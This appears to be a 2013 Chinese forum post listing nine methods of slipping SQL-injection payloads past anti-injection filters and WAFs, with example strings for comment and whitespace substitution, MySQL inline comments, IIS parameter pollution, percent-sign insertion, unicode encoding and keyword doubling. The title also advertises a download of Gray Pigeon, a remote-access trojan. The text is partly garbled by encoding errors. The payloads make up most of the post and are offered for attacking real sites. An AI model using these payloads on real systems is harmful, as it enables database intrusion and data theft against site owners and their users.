|
|
繞過防注入系統(tǒng) 包括WAF的測試等多個(gè)方案 灰鴿子下載
方案一���、 把測試代碼的空格替換成 /**/ 或者+ (注:/**/ 和+ 不要進(jìn)行url編碼)
?
如果要保持原樣復(fù)制代碼���,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02
03 如: id=1 or 1=1
id=1/**/or/**/1=1
id=1+or+1=1
方案二�、把空格替換成非可見字符 %09 %0A %0D %0B
?
如果要保持原樣復(fù)制代碼����,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02
03
04 如: id=1 or 1=1
id=1%09or%091=1
id=1%0Aor%0A1=1
id=1%0A%0Bor%0A%0B1=1
方案三、把關(guān)鍵字用 /*!*/包起來����,注�,這個(gè)方法只適用于mysql數(shù)據(jù)庫的站點(diǎn)
?
如果要保持原樣復(fù)制代碼���,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 and 1=1
id=1 /*!and*/1=1
方案四���、使用參數(shù)污染法攻擊繞過,注�,該方法只適用于webserver是微軟的IIS的情況下
?
如果要保持原樣復(fù)制代碼�,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
方案五、使用%繞過,注,該方法只適用于asp/aspx
?
如果要保持原樣復(fù)制代碼�,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
方案六����、使用%23 (明文為#號)和%0A配合使用繞過�,注,這個(gè)方法只適用于mysql數(shù)據(jù)庫的站點(diǎn)
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
方案七����、使用重復(fù)關(guān)鍵字繞過
?
如果要保持原樣復(fù)制代碼���,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
id=1 ununionion seleselectct 1 frofromm admin
方案八���、使用unicode編碼繞過
?
如果要保持原樣復(fù)制代碼���,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
方案九�、使用畸形包繞過,只適用于 asp/aspx���,詳情可以看80sec的站點(diǎn)
|
|
加載中...
發(fā)表于 2013-2-3 13:59:39
QQ好友和群
收藏
發(fā)表于 2013-2-3 22:34:44